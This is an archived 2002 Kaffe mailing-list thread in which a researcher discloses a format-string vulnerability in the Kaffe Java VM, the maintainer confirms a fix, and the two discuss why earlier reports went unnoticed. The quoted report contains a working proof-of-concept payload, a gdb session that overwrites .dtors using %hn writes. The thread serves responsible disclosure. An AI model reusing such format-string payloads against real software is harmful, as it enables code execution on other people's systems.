Kaffe Exploit is almost finished... second warning for format strings issue.

Jim Pick jim at kaffe.org
Fri Apr 12 21:38:10 PDT 2002 

I don't think anybody behind those email addresses was paying any attention
a few months ago.  :-)

We've got a lot of work to do on the security front yet, but it would be
good if we can get rid of some of the obvious bugs as soon as they are
identified.

Cheers,

 - Jim

----- Original Message -----
From: "KF" <dotslash at snosoft.com>
To: "Jim Pick" <jim at kaffe.org>
Cc: <kaffe at rufus.w3.org>; <recon at snosoft.com>
Sent: Friday, April 12, 2002 10:05 PM
Subject: Re: Kaffe Exploit is almost finished... second warning for format
strings issue.


> No problem... do you know why this went unnoticed for a while? I think I
> mailed it to every mail address I could find on your web site a few
> months back... I even tryed to stuff it in your online bug form thing.
>
> My concern was for things along the line of JanOS and KaffeOS... or java
> network apps that allow clients to make class requests... servlet
> engines and things of that nature...
> -KF
>
>
> Jim Pick wrote:
>
> >Oooh, that's bad.
> >
> >I just committed a fix.  Thanks for the heads up.
> >
> >Hopefully it shouldn't hurt anyone, since people shouldn't be using Kaffe
to
> >run untrusted code until we've fully implemented things like the
verifier.
> >I'll cc: the list so that people know about this.
> >
> >Cheers,
> >
> > - Jim
> >
> >----- Original Message -----
> >From: "KF" <dotslash at snosoft.com>
> >To: <jim at kaffe.org>
> >Sent: Friday, April 12, 2002 8:03 AM
> >Subject: Kaffe Exploit is almost finished... second warning for format
> >strings issue.
> >
> >
> >>0804b6c8 ? __DTOR_END__
> >>[itchie at ghetto itchie]$ gdb -q /usr/local/libexec/Kaffe
> >>(gdb) r  AAAABBBB`perl -e 'print
> >>"\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> >>Starting program: /usr/local/libexec/Kaffe AAAABBBB`perl -e 'print
> >>"\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> >>java.lang.NoClassDefFoundError: AAAABBBBJHEEEE
> >>        at java.lang.Class.forName(Class.java:native)
> >>        at java.lang.Class.forName(Class.java:52)
> >>
> >>Program received signal SIGSEGV, Segmentation fault.
> >>0xbfffff9a in ?? ()
> >>
> >>
> >>-KF
> >>
> >>
> >>
> >
> >
>
>
>
>

More information about the kaffe mailing list